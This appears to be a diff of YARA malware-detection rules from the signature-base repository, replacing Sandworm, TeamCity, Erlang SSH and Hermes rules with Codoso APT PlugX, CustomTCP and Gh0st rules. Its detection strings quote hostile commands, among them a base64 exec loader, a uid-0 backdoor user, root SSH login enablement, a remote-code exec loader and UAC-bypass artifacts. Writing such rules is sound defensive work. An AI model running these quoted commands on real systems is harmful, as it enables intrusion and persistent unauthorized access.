+		$patch_SamIRetrieveMultiplePrimaryCredential = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 41 8B F9 49 8B D8 8B F2 8B E9 4D 85 C0 74 2B 49 8B 40 08 48 85 C0 74 22 66 41 83 38 26 75 1B 66 83 38 4B 75 15 66 83 78 0E 73 75 0E 66 83 78 1E 4B 75 07 B8 A1 02 00 C0 EB 12 E8 ?? ?? ?? ?? 44 8B CF 4C 8B C3 8B D6 8B CD FF 50 20 48 8B 5C 24 30 48 8B 6C 24 38 48 8B 74 24 40 48 83 C4 20 5F C3 }
 
 	condition:
-		filesize < 1000KB and 1 of them
+		any of them
 }
-rule SIGNATURE_BASE_APT_Sandworm_SSHD_Config_Modification_May20_1 : FILE
+rule SIGNATURE_BASE_Codoso_Plugx_3 : FILE
 {
 	meta:
-		description = "Detects ssh config entry inserted by Sandworm on compromised machines"
+		description = "Detects Codoso APT PlugX Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dd60eeb7-3d4b-5a6a-8054-50c617ee8c73"
-		date = "2020-05-28"
+		id = "55066812-3a8e-5099-afb4-ff7a59f1ccb2"
+		date = "2016-01-30"
 		modified = "2023-12-05"
-		reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_exim_expl.yar#L33-L49"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L11-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5775588b3a9d44e9eb2c8ef0f50351d7e3b06f1005f669775fae7187900d5999"
+		hash = "74e1e83ac69e45a3bee78ac2fac00f9e897f281ea75ed179737e9b6fe39971e3"
+		logic_hash = "51615c2583bb672f148f216e4856e7e346b17884f0740d69f6a24f08b594bda4"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
-		hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "AllowUsers mysql_db" ascii
-		$a1 = "ListenAddress" ascii fullword
+		$s1 = "Cannot create folder %sDCRC failed in the encrypted file %s. Corrupt file or wrong password." fullword wide
+		$s2 = "mcs.exe" fullword ascii
+		$s3 = "McAltLib.dll" fullword ascii
+		$s4 = "WinRAR self-extracting archive" fullword wide
 
 	condition:
-		filesize < 10KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1200KB and all of them
 }
-rule SIGNATURE_BASE_APT_Sandworm_Initfile_May20_1 : FILE
+rule SIGNATURE_BASE_Codoso_Plugx_2 : FILE
 {
 	meta:
-		description = "Detects mysql init script used by Sandworm on compromised machines"
+		description = "Detects Codoso APT PlugX Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0bd613e3-6bd4-5cec-bc0d-2bdb83caf142"
-		date = "2020-05-28"
+		id = "0402a0ff-5664-52db-a739-51c5181853f8"
+		date = "2016-01-30"
 		modified = "2023-12-05"
-		reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_exim_expl.yar#L51-L66"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L28-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "989f37069820d9ecf67dc71e4761a7cde2c1adf8db40b5f8a47e9c610ddec2e6"
+		hash = "b9510e4484fa7e3034228337768176fce822162ad819539c6ca3631deac043eb"
+		logic_hash = "5ee652a135d4865340d2ce6421144ec76ccc7ab69704e92904b2e2ebfc72edfc"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
-		hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
-		hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "GRANT ALL PRIVILEGES ON * . * TO 'mysqldb'@'localhost';" ascii
-		$s2 = "CREATE USER 'mysqldb'@'localhost' IDENTIFIED BY '" ascii fullword
+		$s1 = "%TEMP%\\HID" fullword wide
+		$s2 = "%s\\hid.dll" fullword wide
+		$s3 = "%s\\SOUNDMAN.exe" fullword wide
+		$s4 = "\"%s\\SOUNDMAN.exe\" %d %d" fullword wide
+		$s5 = "%s\\HID.dllx" fullword wide
 
 	condition:
-		filesize < 10KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 3 of them ) or all of them
 }
-rule SIGNATURE_BASE_APT_Sandworm_User_May20_1 : FILE
+rule SIGNATURE_BASE_Codoso_Customtcp_4 : FILE
 {
 	meta:
-		description = "Detects user added by Sandworm on compromised machines"
+		description = "Detects Codoso APT CustomTCP Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ada549a4-abcc-5c0a-9601-75631e78c835"
-		date = "2020-05-28"
+		id = "b6ed6939-db0c-5a47-8839-3337d1bc1f6c"
+		date = "2016-01-30"
 		modified = "2023-12-05"
-		reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_exim_expl.yar#L68-L84"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L46-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d052792a674dfa2d93a048b550ea085c3b9225662fdb09bf4a602093b0527e38"
+		logic_hash = "fcabbd37acf75e1233894682e77abad95a849ed68c7e8ce2690dde03d8160f8b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
-		hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ea67d76e9d2e9ce3a8e5f80ff9be8f17b2cd5b1212153fdf36833497d9c060c0"
+		hash2 = "130abb54112dd47284fdb169ff276f61f2b69d80ac0a9eac52200506f147b5f8"
+		hash3 = "3ea6b2b51050fe7c07e2cf9fa232de6a602aa5eff66a2e997b25785f7cf50daa"
+		hash4 = "02cf5c244aebaca6195f45029c1e37b22495609be7bdfcfcd79b0c91eac44a13"
 
 	strings:
-		$s1 = "mysql_db:x:" ascii
-		$a1 = "root:x:"
-		$a2 = "daemon:x:"
+		$x1 = "varus_service_x86.dll" fullword ascii
+		$s1 = "/s %s /p %d /st %d /rt %d" fullword ascii
+		$s2 = "net start %%1" fullword ascii
+		$s3 = "ping 127.1 > nul" fullword ascii
+		$s4 = "McInitMISPAlertEx" fullword ascii
+		$s5 = "sc start %%1" fullword ascii
+		$s6 = "net stop %%1" fullword ascii
+		$s7 = "WorkerRun" fullword ascii
 
 	condition:
-		filesize < 4KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 5 of them ) or ( $x1 and 2 of ( $s* ) )
 }
-rule SIGNATURE_BASE_APT_WEBSHELL_PHP_Sandworm_May20_1 : FILE
+rule SIGNATURE_BASE_Codoso_Customtcp_3 : FILE
 {
 	meta:
-		description = "Detects GIF header PHP webshell used by Sandworm on compromised machines"
+		description = "Detects Codoso APT CustomTCP Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b9ec02c2-fa83-5f21-95cf-3528047b2d01"
-		date = "2020-05-28"
+		id = "b6ed6939-db0c-5a47-8839-3337d1bc1f6c"
+		date = "2016-01-30"
 		modified = "2023-12-05"
-		reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_exim_expl.yar#L86-L101"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L72-L93"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0d10f618c7b465c7691d6054e994a76f56c12eb0a36d2d98b5accd2c1e2c1da7"
+		hash = "d66106ec2e743dae1d71b60a602ca713b93077f56a47045f4fc9143aa3957090"
+		logic_hash = "fb486985587fc28c45cbdf6a63550e60e8d6c18f218544adc19c5604193fe8ea"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
-		hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$h1 = "GIF89a <?php $" ascii
-		$s1 = "str_replace(" ascii
+		$s1 = "DnsApi.dll" fullword ascii
+		$s2 = "softWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\%s" ascii
+		$s3 = "CONNECT %s:%d hTTP/1.1" ascii
+		$s4 = "CONNECT %s:%d HTTp/1.1" ascii
+		$s5 = "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0;)" ascii
+		$s6 = "iphlpapi.dll" ascii
+		$s7 = "%systemroot%\\Web\\" ascii
+		$s8 = "Proxy-Authorization: Negotiate %s" ascii
+		$s9 = "CLSID\\{%s}\\InprocServer32" ascii
 
 	condition:
-		filesize < 10KB and $h1 at 0 and $s1
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 5 of them ) or 7 of them
 }
-rule SIGNATURE_BASE_APT_SH_Sandworm_Shell_Script_May20_1 : FILE
+rule SIGNATURE_BASE_Codoso_Customtcp_2 : FILE
 {
 	meta:
-		description = "Detects shell script used by Sandworm in attack against Exim mail server"
+		description = "Detects Codoso APT CustomTCP Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "21cf2c89-5511-5eb6-a2dd-4ad54ebfa2d1"
-		date = "2020-05-28"
+		id = "b6ed6939-db0c-5a47-8839-3337d1bc1f6c"
+		date = "2016-01-30"
 		modified = "2023-12-05"
-		reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_exim_expl.yar#L103-L129"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L94-L114"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b9116585e74ad6159cd31c0c8a84566f981a62ca5b5f82ace8b855a180461071"
+		hash = "3577845d71ae995762d4a8f43b21ada49d809f95c127b770aff00ae0b64264a3"
+		logic_hash = "a355ac60dca5ca880a90a5c2720690b4691630fd434411758fa7ff006f7389ba"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
-		hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
-		hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "echo \"GRANT ALL PRIVILEGES ON * . * TO 'mysqldb'@'localhost';\" >> init-file.txt" ascii fullword
-		$x2 = "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version" ascii fullword
-		$x3 = "sed -i -e '/PasswordAuthentication/s/no/yes/g; /PermitRootLogin/s/no/yes/g;" ascii fullword
-		$x4 = "useradd -M -l -g root -G root -b /root -u 0 -o mysql_db" ascii fullword
-		$s1 = "/ip.php?port=${PORT}\"" ascii fullword
-		$s2 = "sed -i -e '/PasswordAuthentication" ascii fullword
-		$s3 = "PATH_KEY=/root/.ssh/authorized_keys" ascii fullword
-		$s4 = "CREATE USER" ascii fullword
-		$s5 = "crontab -l | { cat; echo" ascii fullword
-		$s6 = "mysqld --user=mysql --init-file=/etc/opt/init-file.txt --console" ascii fullword
-		$s7 = "sshkey.php" ascii fullword
+		$s1 = "varus_service_x86.dll" fullword ascii
+		$s2 = "/s %s /p %d /st %d /rt %d" fullword ascii
+		$s3 = "net start %%1" fullword ascii
+		$s4 = "ping 127.1 > nul" fullword ascii
+		$s5 = "McInitMISPAlertEx" fullword ascii
+		$s6 = "sc start %%1" fullword ascii
+		$s7 = "B_WKNDNSK^" fullword ascii
+		$s8 = "net stop %%1" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x2123 and filesize < 20KB and 1 of ( $x* ) or 4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 406KB and all of them
 }
-rule SIGNATURE_BASE_APT_RU_Sandworm_PY_May20_1 : FILE
+rule SIGNATURE_BASE_Codoso_PGV_PVID_6 : FILE
 {
 	meta:
-		description = "Detects Sandworm Python loader"
+		description = "Detects Codoso APT PGV_PVID Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a392d800-1fe8-5ae9-b813-e1dfcedecda6"
-		date = "2020-05-28"
+		id = "6d1d8490-fdcb-5263-ae00-0b436e822fc3"
+		date = "2016-01-30"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/billyleonard/status/1266054881225236482"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_exim_expl.yar#L131-L148"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L115-L129"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2ccc4c7fc75c04cbcab34904de2e7ab055a15c1017ec0f8d01b06454f4395047"
+		hash = "4b16f6e8414d4192d0286b273b254fa1bd633f5d3d07ceebd03dfdfc32d0f17f"
+		logic_hash = "0907274bd6c97b7d7b2913e42aa748c92012aeeb32196ddcbcd30332f4e95ac9"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "c025008463fdbf44b2f845f2d82702805d931771aea4b506573b83c8f58bccca"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "o.addheaders=[('User-Agent','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko')]" ascii fullword
-		$s1 = "exec(o.open('http://" ascii
-		$s2 = "__import__({2:'urllib2',3:'urllib.request'}"
+		$s0 = "rundll32 \"%s\",%s" fullword ascii
+		$s1 = "/c ping 127.%d & del \"%s\"" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x6d69 and filesize < 1KB and 1 of ( $x* ) or 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 6000KB and all of them
 }
-rule SIGNATURE_BASE_APT_RU_Sandworm_PY_May20_2 : FILE
+rule SIGNATURE_BASE_Codoso_Gh0St_3 : FILE
 {
 	meta:
-		description = "Detects Sandworm Python loader"
+		description = "Detects Codoso APT Gh0st Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5b32ad64-d959-5632-a03c-17aa055b213f"
-		date = "2020-05-28"
+		id = "55fb17c5-ee11-55be-9af3-e9fe8d6160b5"
+		date = "2016-01-30"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/billyleonard/status/1266054881225236482"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_exim_expl.yar#L150-L167"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L130-L151"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5fb61a9cef64ecf97adc78bf67db667cfd9e5e6f3e03f1bba8f3cdbf6c257520"
+		hash = "bf52ca4d4077ae7e840cf6cd11fdec0bb5be890ddd5687af5cfa581c8c015fcd"
+		logic_hash = "e24d434d8f08b83f8e4b1f4aa75a84a040e4f56cdbd9a58ff49c463437e78c24"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "abfa83cf54db8fa548942acd845b4f34acc94c46d4e1fb5ce7e97cc0c6596676"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "import sys;import re, subprocess;cmd" ascii fullword
-		$x2 = "UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http"
-		$x3 = "';t='/admin/get.php';req" ascii
-		$x4 = "ps -ef | grep Little\\ Snitch | grep " ascii fullword
+		$x1 = "RunMeByDLL32" fullword ascii
+		$s1 = "svchost.dll" fullword wide
+		$s2 = "server.dll" fullword ascii
+		$s3 = "Copyright ? 2008" fullword wide
+		$s4 = "testsupdate33" fullword ascii
+		$s5 = "Device Protect Application" fullword wide
+		$s6 = "MSVCP60.DLL" fullword ascii
+		$s7 = "mail-news.eicp.net" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x6d69 and filesize < 2KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 195KB and $x1 or 4 of them
 }
-rule SIGNATURE_BASE_LOG_EXPL_SUSP_Teamcity_CVE_2023_42793_Oct23_1 : CVE_2023_42793
+rule SIGNATURE_BASE_Codoso_Gh0St_2 : FILE
 {
 	meta:
-		description = "Detects log entries that could indicate a successful exploitation of CVE-2023-42793 on TeamCity servers"
-		author = "Florian Roth"
-		id = "81c04863-72aa-5515-889e-3ef718360cac"
-		date = "2023-10-02"
+		description = "Detects Codoso APT Gh0st Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5643d028-2a76-5bce-bf2f-8be706ab1fd5"
+		date = "2016-01-30"
 		modified = "2023-12-05"
-		reference = "https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_teamcity_2023_42793.yar#L2-L18"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L152-L170"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3b6c8e3e3ff91563899ca94904a56460cd702a3e58e0aacf1c3acb506ec3f959"
-		score = 70
+		hash = "5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841"
+		logic_hash = "5864e52820578769a31a6925795d13283d7b3bc5f9ac50ac8aea6578a5919e71"
+		score = 75
 		quality = 85
-		tags = "CVE-2023-42793"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sa1 = "File edited: "
-		$sa2 = "\\TeamCity\\config\\internal.properties by user with id="
-		$sb1 = "s.buildServer.ACTIVITIES.AUDIT - server_file_change: File "
-		$sb2 = "\\TeamCity\\config\\internal.properties was modified by \"user with id"
+		$s0 = "cmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && sc start %s && ping 127.0.0.1 && sc start %s" fullword ascii
+		$s1 = "rundll32.exe \"%s\", RunMeByDLL32" fullword ascii
+		$s13 = "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" fullword wide
+		$s14 = "%s -r debug 1" fullword ascii
+		$s15 = "\\\\.\\keymmdrv1" fullword ascii
+		$s17 = "RunMeByDLL32" fullword ascii
 
 	condition:
-		all of ( $sa* ) or all of ( $sb* )
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and 1 of them
 }
-rule SIGNATURE_BASE_LOG_EXPL_SUSP_Teamcity_Oct23_1
+rule SIGNATURE_BASE_Codoso_Customtcp : FILE
 {
 	meta:
-		description = "Detects log entries that could indicate a successful exploitation of TeamCity servers"
-		author = "Florian Roth"
-		id = "4845b40a-cf77-53ae-b2fa-d1ed861153f2"
-		date = "2023-10-02"
+		description = "Codoso CustomTCP Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b6ed6939-db0c-5a47-8839-3337d1bc1f6c"
+		date = "2016-01-30"
 		modified = "2023-12-05"
-		reference = "https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_teamcity_2023_42793.yar#L20-L34"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L171-L188"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a2f0abffb9c72e6b32875310e5af7365b6cab4e6c4f6188daa3085b57c38ed0e"
-		score = 70
+		hash = "b95d7f56a686a05398198d317c805924c36f3abacbb1b9e3f590ec0d59f845d8"
+		logic_hash = "4f0333de25b9f84ecaa3e63c5f600f53929244cd63a681d21cb78cfe17ca15f9"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "tbrains.buildServer.ACTIVITIES"
-		$s1 = "External process is launched by user user with id"
-		$s2 = ". Command line: cmd.exe \"/c whoami"
+		$s4 = "wnyglw" fullword ascii
+		$s5 = "WorkerRun" fullword ascii
+		$s7 = "boazdcd" fullword ascii
+		$s8 = "wayflw" fullword ascii
+		$s9 = "CODETABL" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 405KB and all of them
 }
-rule SIGNATURE_BASE_VULN_Erlang_OTP_SSH_CVE_2025_32433_Apr25 : CVE_2025_32433 FILE
+rule SIGNATURE_BASE_Codoso_PGV_PVID_5 : FILE
 {
 	meta:
-		description = "Detects binaries vulnerable to CVE-2025-32433 in Erlang/OTP SSH"
-		author = "Pierre-Henri Pezier, Florian Roth"
-		id = "2a149d28-9dba-546d-abfe-79c0ced34b12"
-		date = "2025-04-18"
-		modified = "2025-04-28"
-		reference = "https://www.upwind.io/feed/cve-2025-32433-critical-erlang-otp-ssh-vulnerability-cvss-10"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vuln_erlang_otp_ssh_cve_2025_32433.yar#L1-L22"
+		description = "Detects Codoso APT PGV PVID Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0202d82c-c1f8-59f7-96b6-b21f21c1dc69"
+		date = "2016-01-30"
+		modified = "2023-12-05"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L192-L208"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "77d23956bd467a6eb56a91fa7a4bd939873363cd101a9d21b5b298c7b2e6c1ec"
-		score = 60
+		logic_hash = "e248bada3ac46611bbe2cf1e1afee902191a2c1fb9611c4a052318e5e093b015"
+		score = 75
 		quality = 85
-		tags = "CVE-2025-32433, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
+		hash2 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
 
 	strings:
-		$a1 = { 46 4F 52 31 ?? ?? ?? ?? 42 45 41 4D }
-		$s1 = "ssh_connection.erl"
-		$fix1 = "chars_limit"
-		$fix2 = "allow    macro_log"
-		$fix3 = "logger"
-		$fix4 = "max_log_item_len"
+		$s1 = "/c del %s >> NUL" fullword ascii
+		$s2 = "%s%s.manifest" fullword ascii
 
 	condition:
-		filesize < 1MB and $a1 at 0 and $s1 and not 1 of ( $fix* )
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them
 }
-rule SIGNATURE_BASE_Hermes2_1 : FILE
+rule SIGNATURE_BASE_Codoso_Gh0St_1 : FILE
 {
 	meta:
-		description = "Detects Hermes Ransomware as used in BAE report on FEIB"
-		author = "BAE"
-		id = "13397a43-04e1-5cc1-9260-9895736013f3"
-		date = "2017-10-11"
+		description = "Detects Codoso APT Gh0st Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "24d9e64c-4b35-5737-92ae-8ec391d494c7"
+		date = "2016-01-30"
 		modified = "2023-12-05"
-		reference = "https://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_hermes_ransom.yar#L1-L27"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L209-L247"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b27881f59c8d8cc529fa80a58709db36"
-		logic_hash = "85a7b3ec89f2bf32e5520a7c5c84661383be71abd8dae3d072d75d5b1118db24"
+		logic_hash = "799ae0946464e5b4980f792e525da9eec46aa7844ec977f892a80f58d8b22afd"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841"
+		hash2 = "7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8"
+		hash3 = "d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297"
 
 	strings:
-		$s1 = "SYSTEM\\CurrentControlSet\\Control\\Nls\\Language\\"
-		$s2 = "0419"
-		$s3 = "0422"
-		$s4 = "0423"
-		$S1 = "HERMES"
-		$S2 = "vssadminn"
-		$S3 = "finish work"
-		$S4 = "testlib.dll"
-		$S5 = "shadowstorageiet"
-		$u1 = "ALKnvfoi4tbmiom3t40iomfr0i3t4jmvri3tb4mvi3btv3rgt4t777"
-		$u2 = "HERMES 2.1 TEST BUILD, press ok"
-		$u3 = "hnKwtMcOadHwnXutKHqPvpgfysFXfAFTcaDHNdCnktA"
+		$x1 = "cmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && sc start %s && ping 127.0.0.1 && sc start %s" fullword ascii
+		$x2 = "rundll32.exe \"%s\", RunMeByDLL32" fullword ascii
+		$x3 = "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" fullword wide
+		$x4 = "\\\\.\\keymmdrv1" fullword ascii
+		$s1 = "spideragent.exe" fullword ascii
+		$s2 = "AVGIDSAgent.exe" fullword ascii
+		$s3 = "kavsvc.exe" fullword ascii
+		$s4 = "mspaint.exe" fullword ascii
+		$s5 = "kav.exe" fullword ascii
+		$s6 = "avp.exe" fullword ascii
+		$s7 = "NAV.exe" fullword ascii
+		$c1 = "Elevation:Administrator!new:" wide
+		$c2 = "Global\\RUNDLL32EXITEVENT_NAME{12845-8654-543}" fullword ascii
+		$c3 = "\\sysprep\\sysprep.exe" wide
+		$c4 = "\\sysprep\\CRYPTBASE.dll" wide
+		$c5 = "Global\\TERMINATEEVENT_NAME{12845-8654-542}" fullword ascii
+		$c6 = "ConsentPromptBehaviorAdmin" fullword ascii
